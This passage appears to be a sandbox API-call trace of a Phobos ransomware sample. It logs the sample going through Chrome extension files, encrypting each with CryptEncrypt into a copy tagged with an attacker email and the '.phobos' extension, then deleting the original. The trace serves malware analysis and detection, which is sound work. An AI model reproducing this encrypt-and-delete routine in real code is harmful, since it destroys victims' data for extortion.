data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json")) returned 1 [0159.232] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0159.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.232] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=720) returned 1 [0159.232] CloseHandle (hObject=0x134) returned 1 [0159.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json")) returned 0x2020 [0159.233] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.233] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.233] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0159.233] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.233] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2d0, lpOverlapped=0x0) returned 1 [0159.711] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2e0) returned 1 [0159.711] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2e0, lpOverlapped=0x0) returned 1 [0159.716] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0159.716] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.716] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0159.716] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.716] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0159.717] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0159.717] CloseHandle (hObject=0x134) returned 1 [0159.717] CloseHandle (hObject=0x130) returned 1 [0159.717] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\messages.json")) returned 1 [0159.718] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0159.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.719] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=640) returned 1 [0159.719] CloseHandle (hObject=0x130) returned 1 [0159.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0159.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.719] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.719] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.723] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0159.723] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.723] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x280, lpOverlapped=0x0) returned 1 [0159.728] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290, dwBufLen=0x290 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x290) returned 1 [0159.728] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x290, lpOverlapped=0x0) returned 1 [0159.729] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0159.729] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.729] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0159.729] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.729] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0159.729] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0159.729] CloseHandle (hObject=0x130) returned 1 [0159.729] CloseHandle (hObject=0x134) returned 1 [0159.730] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\zh_tw\\messages.json")) returned 1 [0159.730] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0159.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.731] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=6159) returned 1 [0159.731] CloseHandle (hObject=0x134) returned 1 [0159.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png")) returned 0x2020 [0159.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.731] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.731] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.732] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0159.732] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.732] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x180f, lpOverlapped=0x0) returned 1 [0159.908] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1810, dwBufLen=0x1810 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1810) returned 1 [0159.908] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1810, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1810, lpOverlapped=0x0) returned 1 [0159.909] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0159.909] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.909] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30, dwBufLen=0x30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x30) returned 1 [0159.909] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.909] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe2, lpOverlapped=0x0) returned 1 [0159.909] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0159.909] CloseHandle (hObject=0x134) returned 1 [0159.910] CloseHandle (hObject=0x130) returned 1 [0159.910] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\128.png")) returned 1 [0159.911] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0159.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.911] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=784) returned 1 [0159.911] CloseHandle (hObject=0x130) returned 1 [0159.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json")) returned 0x2020 [0159.911] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0159.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0159.911] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.911] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0159.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0159.912] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0159.912] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0159.912] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x310, lpOverlapped=0x0) returned 1 [0160.203] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x320, dwBufLen=0x320 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x320) returned 1 [0160.203] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x320, lpOverlapped=0x0) returned 1 [0160.204] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0160.204] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.204] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0160.204] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.204] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0160.204] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.204] CloseHandle (hObject=0x130) returned 1 [0160.204] CloseHandle (hObject=0x134) returned 1 [0160.204] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\manifest.json")) returned 1 [0160.205] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0160.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.206] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=239) returned 1 [0160.206] CloseHandle (hObject=0x134) returned 1 [0160.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json")) returned 0x2020 [0160.206] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 